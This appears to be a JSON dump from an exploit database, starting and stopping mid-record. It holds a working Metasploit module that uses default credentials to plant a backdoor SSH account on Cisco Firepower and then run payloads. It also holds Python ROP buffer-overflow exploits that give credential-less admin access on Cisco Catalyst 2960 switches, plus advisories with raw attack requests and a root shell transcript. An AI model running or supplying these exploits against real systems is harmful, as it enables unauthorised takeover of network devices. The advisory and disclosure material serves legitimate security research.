ARCH_X86, \n'Targets' => \n[ \n[ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 10 2016', \n'CmdStagerFlavor'=> %w{ echo }, \n'DefaultOptions' => \n{ \n'SSL' => 'true', \n'SSLVersion' => 'Auto', \n'RPORT' => 443 \n}, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \n# admin:Admin123 is the default credential for 6.0.1 \nOptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), \nOptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), \nOptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), \nOptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), \nOptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), \nOptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22]) \n], self.class) \nend \n \ndef check \n# For this exploit to work, we need to check two services: \n# * HTTP - To create the backdoor account for SSH \n# * SSH - To execute our payload \n \nvprint_status('Checking Cisco Firepower Management console...') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') \n}) \n \nif res && res.code == 200 \nvprint_status(\"Console is found.\") \nvprint_status(\"Checking SSH service.\") \nbegin \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nNet::SSH.start(rhost, 'admin', \nport: datastore['SSHPORT'], \npassword: Rex::Text.rand_text_alpha(5), \nauth_methods: ['password'], \nnon_interactive: true \n) \nend \nrescue Timeout::Error \nvprint_error('The SSH connection timed out.') \nreturn Exploit::CheckCode::Unknown \nrescue Net::SSH::AuthenticationFailed \n# Hey, it talked. So that means SSH is running. \nreturn Exploit::CheckCode::Appears \nrescue Net::SSH::Exception => e \nvprint_error(e.message) \nend \nend \n \nExploit::CheckCode::Safe \nend \n \ndef get_sf_action_id(sid) \nrequirements = {} \n \nprint_status('Attempting to obtain sf_action_id from rulesimport.cgi') \n \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\" \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') \nend \n \nsf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] \n \nunless sf_action_id \nfail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') \nend \n \nsf_action_id \nend \n \ndef create_ssh_backdoor(sid, user, pass) \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nsf_action_id = get_sf_action_id(sid) \nsh_name = 'exploit.sh' \n \nprint_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\") \n \nmime_data = Rex::MIME::Message.new \nmime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"') \nmime_data.add_part('file', nil, nil, 'form-data; name=\"source\"') \nmime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"') \nmime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"') \nmime_data.add_part( \n\"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\", \n'application/octet-stream', \nnil, \n\"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\" \n) \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\", \n'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\", \n'data' => mime_data.to_s, \n'vars_get' => { 'no_mojo' => '1' }, \n}) \nend \n \ndef generate_new_username \ndatastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) \nend \n \ndef generate_new_password \ndatastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) \nend \n \ndef report_cred(opts) \nservice_data = { \naddress: rhost, \nport: rport, \nservice_name: 'cisco', \nprotocol: 'tcp', \nworkspace_id: myworkspace_id \n} \n \ncredential_data = { \norigin_type: :service, \nmodule_fullname: fullname, \nusername: opts[:user], \nprivate_data: opts[:password], \nprivate_type: :password \n}.merge(service_data) \n \nlogin_data = { \nlast_attempted_at: DateTime.now, \ncore: create_credential(credential_data), \nstatus: Metasploit::Model::Login::Status::SUCCESSFUL, \nproof: opts[:proof] \n}.merge(service_data) \n \ncreate_credential_login(login_data) \nend \n \ndef do_login \nconsole_user = datastore['USERNAME'] \nconsole_pass = datastore['PASSWORD'] \nuri = normalize_uri(target_uri.path, 'login.cgi') \n \nprint_status(\"Attempting to login in as #{console_user}:#{console_pass}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'vars_post' => { \n'username' => console_user, \n'password' => console_pass, \n'target' => '' \n} \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Connection timed out while trying to log in.') \nend \n \nres_cookie = res.get_cookies \nif res.code == 302 && res_cookie.include?('CGISESSID') \ncgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first \nprint_status(\"CGI Session ID: #{cgi_sid}\") \nprint_good(\"Authenticated as #{console_user}:#{console_pass}\") \nreport_cred(username: console_user, password: console_pass) \nreturn cgi_sid \nend \n \nnil \nend \n \ndef execute_command(cmd, opts = {}) \n@first_exec = true \ncmd.gsub!(/\\/tmp/, '/usr/tmp') \n \n# Weird hack for the cmd stager. \n# Because it keeps using > to write the payload. \nif @first_exec \n@first_exec = false \nelse \ncmd.gsub!(/>>/, ' > ') \nend \n \nbegin \nTimeout.timeout(3) do \n@ssh_socket.exec!(\"#{cmd}\\n\") \nvprint_status(\"Executing #{cmd}\") \nend \nrescue Timeout::Error \nfail_with(Failure::Unknown, 'SSH command timed out') \nrescue Net::SSH::ChannelOpenFailed \nprint_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') \nretry \nend \nend \n \ndef init_ssh_session(user, pass) \nprint_status(\"Attempting to log into SSH as #{user}:#{pass}\") \n \nfactory = ssh_socket_factory \nopts = { \nauth_methods: ['password', 'keyboard-interactive'], \nport: datastore['SSHPORT'], \nuse_agent: false, \nconfig: false, \npassword: pass, \nproxy: factory, \nnon_interactive: true \n} \n \nopts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] \n \nbegin \nssh = nil \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \n@ssh_socket = Net::SSH.start(rhost, user, opts) \nend \nrescue Net::SSH::Exception => e \nfail_with(Failure::Unknown, e.message) \nend \nend \n \ndef exploit \n# To exploit the useradd vuln, we need to login first. \nsid = do_login \nreturn unless sid \n \n# After login, we can call the useradd utility to create a backdoor user \nnew_user = generate_new_username \nnew_pass = generate_new_password \ncreate_ssh_backdoor(sid, new_user, new_pass) \n \n# Log into the SSH backdoor account \ninit_ssh_session(new_user, new_pass) \n \nbegin \nexecute_cmdstager({:linemax => 500}) \nensure \n@ssh_socket.close \nend \nend \n \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140467/cisco_firepower_useradd.rb.txt"}, {"lastseen": "2016-12-05T22:16:16", "description": "", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Threat Management Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "PACKETSTORM:138988", "href": "https://packetstormsecurity.com/files/138988/Cisco-Firepower-Threat-Management-Command-Execution.html", "sourceData": "`KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command \nExecution Leading to Root Access \n \nTitle: Cisco Firepower Threat Management Console Remote Command Execution \nLeading to Root Access \nAdvisory ID: KL-001-2016-007 \nPublication Date: 2016.10.05 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Cisco \nAffected Product: Firepower Threat Management Console \nAffected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) \nPlatform: Embedded Linux \nCWE Classification: CWE-434: Unrestricted Upload of File with Dangerous \nType, CWE-94: Improper Control of Generation of Code \nImpact: Arbitrary Code Execution \nAttack vector: HTTP \nCVE-ID: CVE-2016-6433 \n \n2. Vulnerability Description \n \nAn authenticated user can run arbitrary system commands as \nthe www user which leads to root. \n \n3. Technical Description \n \nA valid session and CSRF token is required. The webserver runs as \na non-root user which is permitted to sudo commands as root with \nno password. \n \nPOST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1 \nHost: 1.3.3.7 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) \nGecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nDNT: 1 \nCookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6 \nConnection: close \nContent-Type: multipart/form-data; \nboundary=---------------------------15519792567789791301241925798 \nContent-Length: 813 \n \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"manual_update\" \n \n1 \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"source\" \n \nfile \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"file\"; \nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\" \nContent-Type: application/octet-stream \n \nsudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"action_submit\" \n \nImport \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"sf_action_id\" \n \n8c6059ae8dbedc089877b16b7be2ae7f \n-----------------------------15519792567789791301241925798-- \n \n \nHTTP/1.1 200 OK \nDate: Sat, 23 Apr 2016 13:38:01 GMT \nServer: Apache \nVary: Accept-Encoding \nX-Frame-Options: SAMEORIGIN \nContent-Length: 49998 \nConnection: close \nContent-Type: text/html; charset=utf-8 \n \n... \n \n$ ssh korelogic@1.3.3.7 \nPassword: \n \nCopyright 2004-2016, Cisco and/or its affiliates. All rights reserved. \nCisco is a registered trademark of Cisco Systems, Inc. \nAll other trademarks are property of their respective owners. \n \nCisco Fire Linux OS v6.0.1 (build 37) \nCisco Firepower Management Center for VMWare v6.0.1 (build 1213) \n \nCould not chdir to home directory /Volume/home/korelogic: No such file or \ndirectory \nkorelogic@firepower:/$ sudo su - \nPassword: \nroot@firepower:~# \n \n4. Mitigation and Remediation Recommendation \n \nThe vendor has acknowledged this vulnerability but has \nnot issued a fix. Vendor acknowledgement available at: \n \nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2 \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin (@thatguylevel) of \nKoreLogic, Inc. \n \n6. Disclosure Timeline \n \n2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. \n2016.06.30 - Cisco acknowledges receipt of vulnerability report. \n2016.07.20 - KoreLogic and Cisco discuss remediation timeline for \nthis vulnerability and for 3 others reported in the \nsame product. \n2016.08.12 - 30 business days have elapsed since the vulnerability was \nreported to Cisco. \n2016.09.02 - 45 business days have elapsed since the vulnerability was \nreported to Cisco. \n2016.09.09 - KoreLogic asks for an update on the status of the \nremediation efforts. \n2016.09.15 - Cisco confirms remediation is underway and soon to be \ncompleted. \n2016.09.28 - Cisco informs KoreLogic that the acknowledgement details \nwill be released publicly on 2016.10.05. \n2016.10.05 - Public disclosure. \n \n7. Proof of Concept \n \nSee Technical Description \n \n \nThe contents of this advisory are copyright(c) 2016 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138988/KL-001-2016-007.txt"}, {"lastseen": "2017-04-14T03:24:44", "description": "", "cvss3": {}, "published": "2017-04-13T00:00:00", "type": "packetstorm", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-13T00:00:00", "id": "PACKETSTORM:142132", "href": "https://packetstormsecurity.com/files/142132/Cisco-Catalyst-2960-IOS-12.2-55-SE1-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# Author: \n# Artem Kondratenko (@artkond) \n \nimport socket \nimport sys \nfrom time import sleep \n \nset_credless = True \n \nif len(sys.argv) < 3: \nprint sys.argv[0] + ' [host] --set/--unset' \nsys.exit() \nelif sys.argv[2] == '--unset': \nset_credless = False \nelif sys.argv[2] == '--set': \npass \nelse: \nprint sys.argv[0] + ' [host] --set/--unset' \nsys.exit() \n \n \ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1], 23)) \n \nprint '[+] Connection OK' \nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024)) \n#sleep(0.5) \nprint '[+] Sending cluster option' \n \nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication' \n \n \n \npayload = '\\xff\\xfa\\x24\\x00' \npayload += '\\x03CISCO_KITS\\x012:' \npayload += 'A' * 116 \npayload += '\\x00\\x00\\x37\\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; \n#next bytes are shown as offsets from r1 \npayload += '\\x02\\x2c\\x8b\\x74' # +8 address of pointer to is_cluster_mode function - 0x34 \nif set_credless is True: \npayload += '\\x00\\x00\\x99\\x80' # +12 set address of func that rets 1 \nelse: \npayload += '\\x00\\x04\\xea\\x58' # unset \npayload += 'BBBB' # +16(+0) r1 points here at second gadget \npayload += '\\x00\\xdf\\xfb\\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; \npayload += 'CCCC' # +8 \npayload += 'DDDD' # +12 \npayload += 'EEEE' # +16(+0) r1 points here at third gadget \npayload += '\\x00\\x06\\x78\\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \npayload += '\\x02\\x2c\\x8b\\x60' # +8 r1+8 = 0x022c8b60 \npayload += 'FFFF' # +12 \npayload += 'GGGG' # +16(+0) r1 points here at fourth gadget \npayload += '\\x00\\x6b\\xa1\\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; \nif set_credless: \npayload += '\\x00\\x12\\x52\\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; \nelse: \npayload += '\\x00\\x04\\xe6\\xf0' # unset \npayload += 'HHHH' # +12 \npayload += 'IIII' # +16(+0) r1 points here at fifth gadget \npayload += '\\x01\\x48\\xe5\\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; \npayload += 'JJJJ' # +8 r1 points here at third gadget \npayload += 'KKKK' # +12 \npayload += 'LLLL' # +16 \npayload += '\\x01\\x13\\x31\\xa8' # +20 original execution flow return addr \npayload += ':15:' + '\\xff\\xf0' \n \ns.send(payload) \n \nprint '[+] All done' \n \ns.close() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142132/ciscocatalyst2960rocem-exec.txt"}, {"lastseen": "2017-04-13T03:24:34", "description": "", "cvss3": {}, "published": "2017-04-13T00:00:00", "type": "packetstorm", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE11 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-13T00:00:00", "id": "PACKETSTORM:142121", "href": "https://packetstormsecurity.com/files/142121/Cisco-Catalyst-2960-IOS-12.2-55-SE11-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow \n# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ \n# Date: 04.10.2017 \n# Exploit Author: https://twitter.com/artkond \n# Vendor Homepage: https://www.cisco.com/ \n# Version: IOS version c2960-lanbasek9-mz.122-55.SE11) \n# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11 \n# CVE : CVE-2017-3881 \n# Description: \n# \n# The exploit connects to the Catalyst switch and patches \n# it execution flow to allow credless telnet interaction \n# with highest privilege level \n# \n \n \nimport socket \nimport sys \nfrom time import sleep \n \nset_credless = True \n \nif len(sys.argv) < 3: \nprint sys.argv[0] + ' [host] --set/--unset' \nsys.exit() \nelif sys.argv[2] == '--unset': \nset_credless = False \nelif sys.argv[2] == '--set': \npass \nelse: \nprint sys.argv[0] + ' [host] --set/--unset' \nsys.exit() \n \n \ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1], 23)) \n \nprint '[+] Connection OK' \nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024)) \nprint '[+] Sending cluster option' \nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication' \n \n \n \npayload = '\\xff\\xfa\\x24\\x00' \npayload += '\\x03CISCO_KITS\\x012:' \npayload += 'A' * 116 \npayload += '\\x00\\x00\\x37\\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; \n#next bytes are shown as offsets from r1 \npayload += '\\x02\\x3d\\x55\\xdc' # +8 address of pointer to is_cluster_mode function - 0x34 \nif set_credless is True: \npayload += '\\x00\\x00\\x99\\x9c' # +12 set address of func that rets 1 \nelse: \npayload += '\\x00\\x04\\xeA\\xe0' # unset \npayload += 'BBBB' # +16(+0) r1 points here at second gadget \npayload += '\\x00\\xe1\\xa9\\xf4' # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; \npayload += 'CCCC' # +8 \npayload += 'DDDD' # +12 \npayload += 'EEEE' # +16(+0) r1 points here at third gadget \npayload += '\\x00\\x06\\x7b\\x5c' # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \npayload += '\\x02\\x3d\\x55\\xc8' # +8 r1+8 = 0x23d55c8 \npayload += 'FFFF' # +12 \npayload += 'GGGG' # +16(+0) r1 points here at fourth gadget \npayload += '\\x00\\x6c\\xb3\\xa0' # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; \nif set_credless: \npayload += '\\x00\\x27\\x0b\\x94' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; \nelse: \npayload += '\\x00\\x04\\xe7\\x78' # unset \npayload += 'HHHH' # +12 \npayload += 'IIII' # +16(+0) r1 points here at fifth gadget \npayload += '\\x01\\x4a\\xcf\\x98' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; \npayload += 'JJJJ' # +8 r1 points here at third gadget \npayload += 'KKKK' # +12 \npayload += 'LLLL' # +16 \npayload += '\\x01\\x14\\xe7\\xec' # +20 original execution flow return addr \npayload += ':15:' + '\\xff\\xf0' \n \ns.send(payload) \n \nprint '[+] All done' \n \ns.close() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142121/ciscocatalyst2960-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nAsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "cvss3": {}, "published": "2018-01-22T00:00:00", "type": "exploitpack", "title": "AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EXPLOITPACK:71928799B4AFACF08ED27F548C324480", "href": "", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\n\n\n>> Background and summary\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\n\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\n\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\n\n\n>> Technical details:\n#1\nVulnerability: HTTP server authentication bypass\nCVE-2018-5999\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\nIn AsusWRT_source/router/httpd/httpd.c:\n\nhandle_request(void)\n{\n...\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\n\n\tif (auth_result != 0) <--- auth fails\n\t{\n\t\tif(strcasecmp(method, \"post\") == 0){\n\t\t\tif (handler->input) {\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\n\t\t\t}\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\n\t\t}\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\n\t\treturn;\n\t}\n...\n}\n\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\n\n\n#2\nVulnerability: Unauthorised configuration change (NVRAM value setting)\nCVE-2018-6000\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\nIn AsusWRT_source/router/httpd/web.c:\n\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\n{\n...\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\n\t\t\tbreak;\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\tp = post_buf;\n\t\t\tname = strstr(p, \"\\\"\") + 1;\n\t\t\tp = strstr(name, \"\\\"\");\n\t\t\tstrcpy(p++, \"\\0\");\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\n\t\t\tp = strstr(value, \"\\r\");\n\t\t\tstrcpy(p, \"\\0\");\n\t\t\t//printf(\"%s=%s\\n\", name, value);\n\t\t\tnvram_set(name, value);\n\t\t}\n\t}\n...\n}\n\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\n\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\n\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\n\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\n\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\n\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\n- Header\n typedef struct iboxPKTEx\n {\n BYTE\t\tServiceID;\n BYTE\t\tPacketType;\n WORD\t\tOpCode;\n DWORD \t\tInfo; // Or Transaction ID\n BYTE\t\tMacAddress[6];\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\n } ibox_comm_pkt_hdr_ex;\n\n- Body\n typedef struct iboxPKTCmd\n {\n WORD\t\tlen;\n BYTE\t\tcmd[420];\t\t<--- command goes here\n } PKT_SYSCMD;\t\t// total 422 bytes\n\nA Metasploit module exploiting this vulnerability has been released [3].\n\n\n>> Fix:\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\nSee [4] for the very few details and new firmware released by Asus.\n\n\n>> References:\n[1] https://blogs.securiteam.com/index.php/archives/3589\n[2] https://github.com/jduck/asus-cmd\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:08", "description": "\nCisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "exploitpack", "title": "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EXPLOITPACK:080F4291E285CF4785D54B4437C49803", "href": "", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\nExecution Leading to Root Access\n\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\nLeading to Root Access\nAdvisory ID: KL-001-2016-007\nPublication Date: 2016.10.05\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: 